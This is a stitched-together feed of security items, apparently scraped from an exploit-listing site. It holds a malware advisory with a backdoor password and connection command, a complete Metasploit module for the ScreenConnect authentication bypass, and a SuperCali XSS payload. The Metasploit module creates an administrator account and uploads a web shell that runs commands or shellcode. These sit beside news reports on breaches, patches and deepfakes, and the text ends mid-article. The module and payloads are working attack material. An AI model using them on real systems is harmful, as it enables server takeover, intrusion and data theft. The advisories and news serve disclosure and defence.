Backdoor.Win32.Armageddon.r malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/68d135936512e88cc0704b90bb3839e0.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Armageddon.rVulnerability: Hardcoded Cleartext CredentialsDescription: The malware listens on TCP port 5859 and requires authentication. The password "KOrUPtIzEre" is stored in cleartext within the PE file at offset 0x4635f. Connecting to the backdoor returns the value "1" then enter the password.Family: ArmageddonType: PE32 MD5: 68d135936512e88cc0704b90bb3839e0Vuln ID: MVID-2024-0670Dropped files: IP-logs.txtDisclosure: 02/22/2024Exploit/PoC:root@kali:/home/kali# socat - TCP4:x.x.x.x:58591  KOrUPtIzEre1  DESKTOP-2C4IJHO  VICTIM   WedDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Armageddon.r MVID-2024-0670 Hardcoded Credential

This Metasploit module exploits an authentication bypass vulnerability that allows an unauthenticated attacker to create a new administrator user account on a vulnerable ConnectWise ScreenConnect server. The attacker can leverage this to achieve remote code execution by uploading a malicious extension module. All versions of ScreenConnect version 23.9.7 and below are affected.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'ConnectWise ScreenConnect Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits an authentication bypass vulnerability that allows an unauthenticated attacker to create          a new administrator user account on a vulnerable ConnectWise ScreenConnect server. The attacker can leverage          this to achieve RCE by uploading a malicious extension module. All versions of ScreenConnect version 23.9.7          and below are affected.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # MSF RCE Exploit          'WatchTowr', # Auth Bypass PoC        ],        'References' => [          ['CVE', '2024-1708'], # Path traversal when extracting zip file.          ['CVE', '2024-1709'], # Auth bypass to create admin account.          ['URL', 'https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8'], # Vendor Advisory          ['URL', 'https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/'], #  Auth Bypass PoC          ['URL', 'https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass'] #  Analysis of both CVEs        ],        'DisclosureDate' => '2024-02-19',        'Platform' => %w[win linux unix],        'Arch' => [ARCH_X64, ARCH_CMD],        'Privileged' => true, # 'NT AUTHORITY\SYSTEM' on Windows, root on Linux.        'Targets' => [          [            # Tested ScreenConnect 23.9.7.8804 on Server 2022 with payloads:            # windows/x64/meterpreter/reverse_tcp            'Windows In-Memory', {              'Platform' => 'win',              'Arch' => ARCH_X64            }          ],          [            # Tested ScreenConnect 23.9.7.8804 on Server 2022 with payloads:            # cmd/windows/http/x64/meterpreter/reverse_tcp            'Windows Command', {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'DefaultOptions' => {                'FETCH_COMMAND' => 'CURL',                'FETCH_WRITABLE_DIR' => '%TEMP%'              }            }          ],          [            # Tested ScreenConnect 20.3.31734 on Ubuntu 18.04.6 with payloads:            # cmd/linux/http/x64/meterpreter/reverse_tcp            # cmd/unix/reverse_bash            'Linux Command', {              'Platform' => %w[linux unix],              'Arch' => ARCH_CMD,              'DefaultOptions' => {                'FETCH_COMMAND' => 'WGET',                'FETCH_WRITABLE_DIR' => '/tmp'              }            }          ]        ],        'DefaultOptions' => {          'RPORT' => 8040,          'SSL' => false,          'EXITFUNC' => 'thread'        },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            IOC_IN_LOGS,            CONFIG_CHANGES,            # The existing administrator account will be replaced            ACCOUNT_LOCKOUTS          ]        }      )    )    register_options([      OptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alpha_lower(8)]),      OptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(16)])    ])  end  def check    # This is a file found on the recent 23.9.7.8804 (Circa 2024), an out of support 20.3.31734 (Circa 2021), and    # a very old 2.5.3409.4645 (Circa 2012). So we can expect this file to exist on all targets. As this endpoint    # expects authentication, the response will be a 302 redirect to the Login page. As Windows is case insensitive    # we can request 'Host.aspx' with any case and get the expected 302 response, however Linux is case sensitive and    # will always 404 a request to 'Host.aspx' if we jumble up the case. Both a 302 and 404 response will still include    # the Server header, which we use to confirm both ScreenConnect and the version number.    host_aspx = 'Host.aspx'    host_aspx = loop do      jumblecase_host_aspx = host_aspx.chars.map { |c| rand(2) == 0 ? c.upcase : c.downcase }.join      break jumblecase_host_aspx unless jumblecase_host_aspx == host_aspx    end    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, host_aspx)    )    return CheckCode::Unknown('Connection failed') unless res    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 302 || res.code == 404    platform = res.code == 302 ? 'Windows' : 'Linux'    if res.headers.key?('Server') && (res.headers['Server'] =~ %r{ScreenConnect/(\d+\.\d+.\d+)})      detected = "ConnectWise ScreenConnect #{Regexp.last_match(1)} running on #{platform}."      if Rex::Version.new(Regexp.last_match(1)) <= Rex::Version.new('23.9.7')        return CheckCode::Appears(detected)      end      return CheckCode::Safe(detected)    end    CheckCode::Unknown  end  def exploit    # Sanity check the USERNAME and PASSWORD will meet the servers password requirements.    fail_with(Failure::BadConfig, 'USERNAME must not be empty.') if datastore['USERNAME'].empty?    fail_with(Failure::BadConfig, 'PASSWORD must be 8 characters of more.') if datastore['PASSWORD'].length < 8    #    # 1. Begin the setup wizard using the vulnerability to access the SetupWizard.aspx page.    #    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/')    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply when initiating setup wizard.')    end    viewstate, viewstategen = get_viewstate(res)    unless viewstate && viewstategen      fail_with(Failure::UnexpectedReply, 'Did not locate the view state after initiating setup wizard.')    end    #    # 2. Advance to the next step in the setup.    #    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),      'vars_post' => {        '__EVENTTARGET' => '',        '__EVENTARGUMENT' => '',        '__VIEWSTATE' => viewstate,        '__VIEWSTATEGENERATOR' => viewstategen,        'ctl00$Main$wizard$StartNavigationTemplateContainerID$StartNextButton' => 'Next'      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply from first step in setup wizard.')    end    viewstate, viewstategen = get_viewstate(res)    unless viewstate && viewstategen      fail_with(Failure::UnexpectedReply, 'Did not locate the view after first step in setup wizard.')    end    #    # 3. Create a new administrator account.    #    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),      'vars_post' => {        '__EVENTTARGET' => '',        '__EVENTARGUMENT' => '',        '__VIEWSTATE' => viewstate,        '__VIEWSTATEGENERATOR' => viewstategen,        'ctl00$Main$wizard$userNameBox' => datastore['USERNAME'],        'ctl00$Main$wizard$emailBox' => Faker::Internet.email(name: datastore['USERNAME']).to_s,        'ctl00$Main$wizard$passwordBox' => datastore['PASSWORD'],        'ctl00$Main$wizard$verifyPasswordBox' => datastore['PASSWORD'],        'ctl00$Main$wizard$StepNavigationTemplateContainerID$StepNextButton' => 'Next'      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply from create account step in setup wizard.')    end    print_status("Created account: #{datastore['USERNAME']}:#{datastore['PASSWORD']} (Note: This account will not be deleted by the module)")    #    # 4. Log in with this account to get an authenticated HTTP session.    #    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'Administration'),      'keep_cookies' => true,      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to login with admin credentials.')    end    if res.body =~ %r{"antiForgeryToken"\s*:\s*"([a-zA-Z0-9+/=]+)"}      anti_forgery_token = Regexp.last_match(1)    else      # The antiForgeryToken is not present in older versions of ScreenConnect (Tested with 20.3.31734).      print_warning('Could not locate anti forgery token after login with admin credentials.')      anti_forgery_token = ''    end    #    # 5. Create an extension to host the payload.    #    # NOTE: Rex::Text.rand_guid return a GUID string wrapped in curly braces which is not what we want, so we use    # Faker::Internet.uuid instead.    plugin_guid = Faker::Internet.uuid    payload_ashx = "#{Rex::Text.rand_text_alpha_lower(8)}.ashx"    # According to Microsoft (https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/keywords/) these are    # the list of valid C# keywords, we create a Rex::RandomIdentifier::Generator to generate new identifiera for    # use in the ASHX payload, and pass the list of valid C# keywords as a forbidden list so we dont accidentaly    # generate a valid keyword.    vars = Rex::RandomIdentifier::Generator.new({      forbidden: %w[        abstract add alias and args as ascending async await        base bool break by byte case catch char checked class const continue decimal default delegate descending do        double dynamic else enum equals event explicit extern false file finally fixed float for foreach from get        global goto group if implicit in init int interface internal into is join let lock long managed nameof        namespace new nint not notnull nuint null object on operator or orderby out override params partial private        protected public readonly record ref remove required return sbyte scoped sealed select set short sizeof        stackalloc static string struct switch this throw true try typeof uint ulong unchecked unmanaged unsafe ushort        using value var virtual void volatile when where while with yield      ]    })    if target['Arch'] == ARCH_CMD      payload_data = %(<% @ WebHandler Language="C#" Class="#{vars[:var_handler_class]}" %>using System;using System.Web;using System.Diagnostics;public class #{vars[:var_handler_class]} : IHttpHandler{  public void ProcessRequest(HttpContext #{vars[:var_ctx]})  {    if (String.IsNullOrEmpty(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"])) {      return;    }    byte[] #{vars[:var_bytearray]} = Convert.FromBase64String(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"]);    string #{vars[:var_payload]} = System.Text.Encoding.UTF8.GetString(#{vars[:var_bytearray]});    ProcessStartInfo #{vars[:var_psi]} = new ProcessStartInfo();    #{vars[:var_psi]}.FileName = "#{target['Platform'] == 'win' ? 'cmd.exe' : '/bin/sh'}";    #{vars[:var_psi]}.Arguments = "#{target['Platform'] == 'win' ? '/c' : '-c'} \\\"" + #{vars[:var_payload]} + "\\\"";    #{vars[:var_psi]}.RedirectStandardOutput = true;    #{vars[:var_psi]}.UseShellExecute = false;    Process.Start(#{vars[:var_psi]});  }  public bool IsReusable { get { return true; } }})    else      payload_data = %(<% @ WebHandler Language="C#" Class="#{vars[:var_handler_class]}" %>using System;using System.Web;using System.Diagnostics;using System.Runtime.InteropServices;public class #{vars[:var_handler_class]} : IHttpHandler{  [System.Runtime.InteropServices.DllImport("kernel32")]  private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UIntPtr size, Int32 flAllocationType, IntPtr flProtect);  [System.Runtime.InteropServices.DllImport("kernel32")]  private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UIntPtr dwStackSize, IntPtr lpStartAddress, IntPtr param, Int32 dwCreationFlags, ref IntPtr lpThreadId);  public void ProcessRequest(HttpContext #{vars[:var_ctx]})  {    if (String.IsNullOrEmpty(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"])) {      return;    }    byte[] #{vars[:var_bytearray]} = Convert.FromBase64String(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"]);    IntPtr #{vars[:var_func_addr]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{vars[:var_bytearray]}.Length, 0x3000, (IntPtr)0x40);    Marshal.Copy(#{vars[:var_bytearray]}, 0, #{vars[:var_func_addr]}, #{vars[:var_bytearray]}.Length);    IntPtr #{vars[:var_thread_id]} = IntPtr.Zero;    CreateThread(IntPtr.Zero, UIntPtr.Zero, #{vars[:var_func_addr]}, IntPtr.Zero, 0, ref #{vars[:var_thread_id]});  }  public bool IsReusable { get { return true; } }})    end    manifest_data = %(<?xml version="1.0" encoding="utf-8"?><ExtensionManifest>  <Version>#{Faker::App.version}</Version>  <Name>#{Faker::App.name}</Name>  <Author>#{Faker::Name.name}</Author>  <ShortDescription>#{Faker::Lorem.sentence}</ShortDescription>  <Components>    <WebServiceReference SourceFile="#{payload_ashx}"/>  </Components></ExtensionManifest>)    zip_resources = Rex::Zip::Archive.new    zip_resources.add_file("#{plugin_guid}/Manifest.xml", manifest_data)    # We can leverage CVE-2024-1708 to write one level below the extension directory. This enable Linux targets to work.    zip_resources.add_file("#{plugin_guid}/../#{payload_ashx}", payload_data)    #    # 6. Upload the payload extension.    #    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'Services', 'ExtensionService.ashx', 'InstallExtension'),      'keep_cookies' => true,      'ctype' => 'application/json',      'data' => "[\"#{Base64.strict_encode64(zip_resources.pack)}\"]",      'headers' => {        'X-Anti-Forgery-Token' => anti_forgery_token      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to install extension.')    end    print_status("Uploaded Extension: #{plugin_guid}")    if target['Platform'] == 'win'      # On Windows the current working directory is C:\Windows\System32\ and we dont leak out the install path      # so we use the default installation location...      register_files_for_cleanup("C:\\Program Files (x86)\\ScreenConnect\\App_Extensions\\#{payload_ashx}")    else      # For Linux the current working is the install path (/opt/screenconnect) so we can use a relative path...      register_files_for_cleanup("App_Extensions/#{payload_ashx}")    end    begin      #      # 7. Trigger the payload by requesting the extensions .ashx file.      #      if target['Arch'] == ARCH_CMD        payload_data = payload.encoded.gsub('\\', '\\\\\\\\')      else        payload_data = payload.encoded      end      res = send_request_cgi(        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'App_Extensions', payload_ashx),        'keep_cookies' => true,        'vars_post' => {          vars[:var_payload_key] => Base64.strict_encode64(payload_data)        }      )      unless res&.code == 200        fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to trigger payload.')      end    ensure      #      # 8. Ensure we remove the extension when we are done.      #      print_status("Removing Extension: #{plugin_guid}")      res = send_request_cgi(        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'Services', 'ExtensionService.ashx', 'UninstallExtension'),        'keep_cookies' => true,        'ctype' => 'application/json',        'data' => "[\"#{plugin_guid}\"]",        'headers' => {          'X-Anti-Forgery-Token' => anti_forgery_token        }      )      unless res&.code == 200        print_warning('Failed to remove the extension.')      end    end  end  def get_viewstate(res)    vs_input = res.get_html_document.at('input[name="__VIEWSTATE"]')    unless vs_input&.key? 'value'      print_error('Did not locate the __VIEWSTATE.')      return nil    end    vsgen_input = res.get_html_document.at('input[name="__VIEWSTATEGENERATOR"]')    unless vsgen_input&.key? 'value'      # The __VIEWSTATEGENERATOR is not present in older versions of ScreenConnect (Tested with 20.3.31734).      print_warning('Did not locate the __VIEWSTATEGENERATOR.')      return [vs_input['value'], '']    end    [vs_input['value'], vsgen_input['value']]  endend

ConnectWise ScreenConnect 23.9.7 Unauthenticated Remote Code Execution

SuperCali version 1.1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: SuperCali Version : 1.1.0 - Reflected XSS# Date: 2024-23-02# Exploit Author: tmrswrr# Vendor Homepage: https://supercali.inforest.com# Version : 1.1.0# Tested on: https://softaculous.com/demos/supercali1 ) Go to admin login url :  https://127.0.0.1/SuperCali/login.php2 ) Write your payload admin place : "><img src=x onerrora=confirm() onerror=confirm(1)>3 ) AFter click login will you see alert button : https://127.0.0.1/SuperCali/bad_password.php?email=\%22%3E%3Cimg%20src=x%20onerrora=confirm()%20onerror=confirm(1)%3E&return_to=127.0.0.1/&o=4&c=1&m=02&a=22&y=2024&w=1

SuperCali 1.1.0 Cross Site Scripting

By Waqas
The IntelBroker hacker has claimed responsibility for the breach.
This is a post from HackRead.com Read the original post: Hackers Leak 2.5M Private Plane Owners’ Data Linked to LA Intl. Airport Breach

IntelBroker informed Hackread.com that they successfully executed the data breach by exploiting a vulnerability within one of the CRM systems utilized by the Los Angeles International Airport.

The notorious hacker known as IntelBroker is making headlines once again with a daring alleged breach targeting one of the United States’ most critical organizations: the Los Angeles International Airport.

In a bold move, IntelBroker claims to have breached the database of the Los Angeles International Airport, making off with a trove of confidential user data belonging to private plane owners – The breach, according to the hacker, took place in February 2024.

It is important to note that no customer or traveller data is involved in this breach. However, the incident has apparently resulted in the compromise of a significant 2.5 million records, including sensitive information such as:

*   Full names
*   CPA numbers
*   Email addresses (1.9 million emails – total 15,8000 emails after removing duplicates).
*   Company names
*   Plane model numbers
*   Tail numbers (Refers to an identification number painted on an aircraft tail).

Data analysed by Hackread.com

The breach was publicly disclosed by IntelBroker on the notorious hacker and cybercrime platform Breach Forums, adding another high-profile hack to their already extensive. Notable targets of IntelBroker’s previous hacks include the Weee! Grocery platform, General Electric, Staffing Giant Robert Half, and a recent data leak involving a partial Facebook Marketplace database.

Upon learning of the breach, Hackread.com promptly reached out to IntelBroker, who confirmed their involvement and provided limited insight into their methods. According to IntelBroker, they exploited a vulnerability in the airport’s Customer Relationship Management (CRM) system (CRM system) to gain unauthorized access to the database, highlighting the critical need for organizations to strengthen their cybersecurity measures in the face of growing threats from skilled hackers like IntelBroker.

The screenshot below, obtained from Breach Forums, displays the listing of the data breach. It is important to highlight that the breach details attribute the hack to a user named “kwillsy.” However, in a statement to Hackread.com, IntelBroker clarified that “kwillsy” is not associated with the breach, and they take full responsibility for the hack.

Screenshot credit: Hackread.com

Hackread.com has contacted the relevant authorities at the LA Airport, and this article will be updated accordingly pending their response.

****Increasing Data Breaches****

During the initial months of 2024, there has been a marked surge in data breaches impacting various sectors, encompassing both corporate entities and governmental bodies. Last week, Infosys disclosed a breach that affected more than 57,000 Bank of America customers.

In earlier weeks of the same month, two prominent US insurance firms, Washington National Insurance Company and Bankers Life and Casualty Company, reported breaches linked to SIM-swapping incidents, impacting over 66,000 customers collectively.

In January, Jason’s Deli encountered a significant breach, exposing the personal details of over 344,000 users due to a successful credential-stuffing attack. Concurrently, hackers targeted Indian ISP Hathway, compromising the personal information and KYC records of over 4 million unsuspecting customers.

****RELATED ARTICLES****

1.  **23andMe blames its users for the massive data breach**
2.  **AnyDesk Urges Password Change Amid Security Breach**
3.  **Defunct Ambulance Service Data Breach Impacts 1 Million**
4.  **Los Angeles Traffic Sign hacked with an awesome message**
5.  **Cloudflare Hacked After State Actor Leverages Okta Breach**
6.  **RingGo Owner EasyPark Hit by Data Breach, User Data Stolen**

Hackers Leak 2.5M Private Plane Owners’ Data Linked to LA Intl. Airport Breach

Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can cause arbitrary, unsandboxed JavaScript to be executed on the server.

This issue is a legacy of CVE-2023-49299. We didn't fix it completely in CVE-2023-49299, and we added one more patch to fix it.

This issue affects Apache DolphinScheduler: until 3.2.1.

Users are recommended to upgrade to version 3.2.1, which fixes the issue.



Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-23320

**Apache DolphinScheduler vulnerable to arbitrary JavaScript execution as root for authenticated users**

Critical severity GitHub Reviewed Published Feb 23, 2024 to the GitHub Advisory Database • Updated Feb 23, 2024

**Package**

maven org.apache.dolphinscheduler:dolphinscheduler (Maven)

**Affected versions**

< 3.2.1

**Description**

Published to the GitHub Advisory Database

Feb 23, 2024

Last updated

Feb 23, 2024

GHSA-rc6h-qwj9-2c53: Apache DolphinScheduler vulnerable to arbitrary JavaScript execution as root for authenticated users

On February 20, Joomla! posted details about four vulnerabilities it had fixed in its Content Management System (CMS), and one in the Joomla! Framework that affects the CMS.

Joomla! is an open-source CMS that’s been around since 2005, and has been one of the most popular CMS platforms by market share for much of that time. Many companies, from small outfits to large enterprises, use a CMS in some form to manage their websites. There are lots of advantages to using a popular CMS, but if you do you should keep an eye out for updates. And this looks like an important one.

Just last month, a vulnerability patched in February 2023 was added to CISA’s catalog of known exploited vulnerabilities, suggesting a lack of patching urgency by some Joomla! owners. Let’s see if we can avoid duplicating that scenario.

To make this happen, Joomla! CMS users should upgrade to version 3.10.15-elts, 4.4.3 or 5.0.3. The latest releases that include the fixes are available for download. Links can be found on the release news page. The latest versions can always be found on the latest release tab. The extended long term support (elts) versions can be found on the dedicated elts site.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. We’ll list them below,  but the descriptions of the vulnerabilities require some explaining.

*   CVE-2024-21722: The multi-factor authentication (MFA) management features did not properly terminate existing user sessions when a user’s MFA methods have been modified. This suggest that logged-in users could stay logged in if an administrator changed their MFA method. This is a problem if you are changing the MFA method because you suspect there has been unauthorized access.
*   CVE-2024-21723: Inadequate parsing of URLs could result into an open redirect. An open redirect vulnerability occurs when an application allows a user to control how an HTTP redirect behaves. Phishers love open redirects on legitimate sites because the URLs look like they go to the legitimate site, when in fact they redirect to another site.
*   CVE-2024-21724: Inadequate input validation for media selection fields lead to Cross-site scripting (XSS) vulnerabilities in various extensions. XSS is a type of vulnerability that allows an attacker to inject malicious code into a site’s content. Input validation should stop that injection.
*   CVE-2024-21725: Inadequate escaping of mail addresses lead to XSS vulnerabilities in various components. According to Joomla! this is the vulnerability with the highest exploitation probability. A website user could input data in the email address field that would cause a XSS vulnerability because it was not properly escaped. Email addresses need to be escaped because otherwise they could be interpreted as HTML code.
*   CVE-2024-21726: Inadequate content filtering leads to XSS vulnerabilities in various components. This is the vulnerability in the Joomla! Framework. Apparently there has been an oversight in the filtering code which can cause XSS vulnerabilities in several components. Researchers found that attackers can exploit this issue to gain remote code execution by tricking an administrator into clicking on a malicious link.

These researchers also urged users to update their CMS:

> “”While we won’t be disclosing technical details at this time, we want to emphasize the importance of prompt action to mitigate this risk.”

**Secure your CMS**

There are a few obvious and easy-to-remember rules to keep in mind if you want to use a CMS without compromising your security. They are as follows:

*   Choose a CMS from an organization that actively looks for and fixes security vulnerabilities.
*   If it has a mailing list for informing users about patches, join it.
*   Enable automatic updates if the CMS supports them.
*   Use the fewest number of plugins you can, and do your due diligence on the ones you use.
*   Keep track of the changes made to your site and its source code.
*   Secure accounts with two-factor authentication (2FA).
*   Give users the minimum access rights they need to do their job.
*   Limit file uploads to exclude code and executable files, and monitor them closely.
*   Use a Web Application Firewall (WAF).

If your CMS is hosted on your own servers, be aware of the dangers that this setup brings and keep it separated from other parts of your network.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using ThreatDown Vulnerability and Patch Management.

 Joomla! patches XSS flaws that could lead to remote code execution 

The application suffers from an unquoted search path issue impacting the service 'Tosibox Key Service' for Windows deployed as part of Tosibox software application. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

Tosibox Key Service 3.3.0 Local Privilege Escalation

ConnectWise customers need to take immediate action to remediate a critical vulnerability.

ConnectWise is warning self-hosted and on-premise customers that they need to take immediate action to remediate a critical vulnerability in its ScreenConnect remote desktop software. This software is typically used in data-centers and for remote assistance. Together ConnectWise’s partners manage millions of endpoints (clients).

A Shadowserver scan revealed approximately 3,800 vulnerable ConnectWise ScreenConnect instances on Wednesday, most of them in the US.

The Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities Catalog. ConnectWise has shared three IP addresses that were recently used by threat actors:

*   155.133.5.15
*   155.133.5.14
*   118.69.65.60

These IP addresses are all blocked by ThreatDown and Malwarebytes solutions.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The flaw added to the CISA Catalog is CVE-2024-1709, an authentication bypass vulnerability with a CVSS score of 10 that could allow an attacker administrative access to a compromised instance. With administrative access it is trivial to create and upload a malicious ScreenConnect extension to gain Remote Code Execution (RCE).

Affected versions are ScreenConnect 23.9.7 and prior. Cloud partners don’t need to take any actions. ScreenConnect servers hosted in on screenconnect.com and hostedrmm.com have been updated to remediate the issue. 

Partners that are self-hosted or on-premise need to update their servers to version 23.9.8 immediately to apply a patch. ConnectWise will also provide updated versions of releases 22.4 through 23.9.7 for the critical issue, but strongly recommends that partners update to ScreenConnect version 23.9.8.

For instructions on updating to the newest release, please reference this doc: Upgrade an on-premise installation – ConnectWise.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 Update now! ConnectWise ScreenConnect vulnerability needs your attention 

By Deeba Ahmed
In 2024, over 60 countries worldwide are holding elections. The most significant threat to the integrity of these elections? Deepfake videos, readily accessible on the dark web and Telegram, with prices ranging from as low as $2 to $100.
This is a post from HackRead.com Read the original post: Deepfake Threat: $2 Deceptive Content Undermines Election Integrity

Deepfake technology poses a significant threat to the upcoming US elections as it is not just a technological challenge but a manifestation of a broader deception mechanism, explained Check Point Research (CPR).

In its latest report, cybersecurity researchers at Check Point Research team highlighted the dangers posed by the widespread availability of artificial intelligence-based technologies, particularly deepfake, in encouraging electoral fraud.

Researchers cited deepfake technology as a significant threat to the authenticity of the electoral process due to features like voice cloning that can manipulate voters and sabotage the entire process. The technology is cheap, accessible to anyone with an internet connection, and untraceable, which hinders election security given the ongoing challenges in legislating against these technologies.

**Deepfake** technology allows users to create “fabricated audiovisual content,” which poses a threat to public opinion and democratic institutions, researchers noted. With over 3,000 repositories on GitHub and hundreds of channels on Telegram (at least 400-500), deepfake services range from automated bots to personalized services. Pricing varies from $2 per video to $100 for multiple attempts, making it affordable to commission deceptive content.

Recent incidents of damage caused by deepfake technology highlight its growing threat. **In February 2024**, an Asian company fell victim to scammers who impersonated the company’s CFO during an online meeting, resulting in a loss of over $25 million.

On platforms like YouTube, deepfake technology is being exploited by scammers to perpetrate crypto scams. Verified channels have been targeted **to steal millions of dollars worth of crypto**, with deepfakes of prominent figures such as Elon Musk, Bill Gates, Ripple’s CEO Brad Garlinghouse, Michael J. Saylor, and others being used to deceive unsuspecting viewers.

**In June 2023**, deepfake technology was utilized to disseminate fabricated video messages from President Putin. Similarly, **in 2022**, a deepfake video of Ukrainian President Zelensky went viral, urging Ukrainians to surrender.

Despite efforts to combat deepfakes, such as the launch of **McAfee’s tool MockingBird**, which boasts a 90% accuracy rate in detecting malicious content, the potential damage from deepfake technology remains considerable and, in many cases, irreversible.

“The potential for election fraud through the adept use of artificial intelligence and deepfake technologies, orchestrated by a clandestine network operating from the shadows, leaving no digital fingerprints” Check Point Research Team wrote in the **blog post** published on 22 February 2024.

Researchers noted that an underground network of actors can manipulate public perception and undermine democratic integrity through deepfakes. The anonymity of this technology makes it difficult to hold anyone accountable. **Traditional cybersecurity measures** are insufficient as the threat lies in the entire ecosystem of deception it enables, including bots, fake accounts, and anonymized services.

**Voice cloning**, a subset of deepfake technology that uses machine learning and artificial intelligence to replicate a person’s voice with remarkable accuracy, is particularly effective in spreading misinformation. It allows the creation of convincing fake audio clips and is particularly effective in spreading misinformation, as incidents involving robocalls with fabricated messages from political leaders have already been observed.

For instance, a robocall featuring fake US President **Joe Biden voice warning** New Hampshire voters not to cast their ballots would cost from $10 to several hundred dollars depending on the level of accuracy and technological efficacy required.

To protect democratic processes from deepfakes, a multifaceted approach involving legislative measures, public awareness, technological solutions, and international cooperation is needed, including enhanced digital literacy and collaboration between technology companies and law enforcement, researchers concluded.

1.  **Website uses AI to create utterly realistic human faces**
2.  **Fake Voicemails Target Users, 1000 Attacks in 14 Days**
3.  **Scammers Weaponize Google Forms in New BazarCall Attack**
4.  **Scammers Made Deepfake AI Hologram of Binance Executive**
5.  **Building Defense Toolbox: Tools, Tactics to Combat Cyber Threats**

Deepfake Threat: $2 Deceptive Content Undermines Election Integrity

The locations of microphones used to detect gunshots have been kept hidden from police and the public. A WIRED analysis of leaked coordinates confirms arguments critics have made against the technology.

Finding shell casings can be extremely difficult. A Los Angeles Police Department officer not authorized to speak to the media tells WIRED they’ve spent “hours” searching for bullet casings. Just because officers don’t find evidence of gunfire, they say, doesn’t mean it didn’t happen.

While SoundThinking says its alerts are reviewed by its Incident Review Center before being sent to the police, in Pasadena, officers who investigated ShotSpotter alerts reported that the suspected gunfire was sometimes something else entirely: a car backfiring, construction noise, or fireworks, Knock LA reported.

